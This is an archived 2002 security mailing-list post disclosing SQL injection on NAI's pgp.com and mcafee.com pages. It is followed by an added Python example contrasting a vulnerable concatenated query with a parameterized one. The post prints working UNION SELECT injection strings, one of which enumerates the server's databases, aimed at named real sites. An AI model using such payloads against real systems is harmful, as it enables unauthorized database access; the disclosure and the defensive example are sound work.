Re: Pgp.com was exposing ... information.

From: c c (cesarc56at_private)
Date: Thu Feb 07 2002 - 08:25:50 PST


    After the post I received this e-mail:
    
    -------------------start-------------------
    Thank you for bringing this matter to our attention.
    The problem has been corrected.
    
    Web Support
    Network Associates
    websupportat_private
    www.nai.com
    
    This e-mail and any files transmitted with it are the property of
    Network Associates and/or its affiliates, are confidential, and are
    intended solely for the use of the individual or entity to whom this
    e-mail is addressed. If you are not one of the named recipient(s) or
    otherwise have reason to believe that you have received this message in
    error, please notify the sender and delete this message immediately from
    your computer. Any other use, retention, dissemination, forwarding,
    printing or copying of this e-mail is strictly prohibited.
    
    
    -----Original Message-----
    From: cesarc56at_private [mailto:cesarc56at_private] 
    Sent: Thursday, January 24, 2002 10:49 AM
    To: websupportat_private
    Subject: Error Messages
    
    Response Required? Yes
    
    Phone: 0054 0343 175838551
    
    Problem Area: Error Messages
    
    Problem URL:
    http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.asp?Country=Argentina')%20union%20select%20'a'--
    
    Referring URL:
    http://www.pgp.com/naicommon/partners/tsp-seek/latam/resellers/resellers.asp
    
    Problem Description: The script page referenced in the Problem URL
    above allows SQL injection and cross-site scripting; this could reveal
    critical customer and database information. I hope it's very important
    to fix that quickly.
    
    Please contact me as soon as possible for details.
    
    Cesar Cerrudo.
    Parana, Entre Rios.
    Argentina.
    
    -------------------end-------------------
    A bit late, no?
    
    NAI people, don't forget to check this quickly.
    Go to:
    
    http://vil.mcafee.com/advsearch.asp
    
    and input in a search field this:
    
    asdf') union all select '1',name  from
    master..sysdatabases--
    
    and submit! 
    You will never learn.
    
    Sorry.
    
    Cesar Cerrudo.
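
An added example, not part of the original message and not NAI's code: a hypothetical reseller lookup in Python with sqlite3 that shows why the `Country` value from the report changes the query when it is concatenated into the SQL text, and how a bound parameter prevents that. The table, the function names and the query shape are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for a reseller table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE resellers (name TEXT, country TEXT)")
    db.executemany(
        "INSERT INTO resellers VALUES (?, ?)",
        [("Reseller A", "Argentina"), ("Reseller B", "Chile")],
    )
    return db

def lookup_concatenated(db, country):
    # Vulnerable shape (assumed): the request value is pasted into the SQL text.
    sql = "SELECT name FROM resellers WHERE (country = '" + country + "')"
    return sorted(row[0] for row in db.execute(sql))

def lookup_parameterized(db, country):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = "SELECT name FROM resellers WHERE (country = ?)"
    return sorted(row[0] for row in db.execute(sql, (country,)))

def query_structure_changes(lookup, db, value):
    """Regression check: True if `value` yields rows that no stored reseller
    explains, or a SQL error, i.e. the input altered the query itself."""
    legit = {name for (name,) in db.execute("SELECT name FROM resellers")}
    try:
        return bool(set(lookup(db, value)) - legit)
    except sqlite3.Error:
        # A syntax error triggered by user input also points at concatenation.
        return True

# Value from the Problem URL in the report, URL-decoded.
REPORTED_VALUE = "Argentina') union select 'a'--"

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concatenated, lookup_parameterized):
        print(fn.__name__, fn(db, REPORTED_VALUE), "structure changed:",
              query_structure_changes(fn, db, REPORTED_VALUE))
```

The same check can be pointed at any lookup function in a test suite, using ordinary values that contain a quote (such as a name with an apostrophe) as additional inputs.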
    
    
    


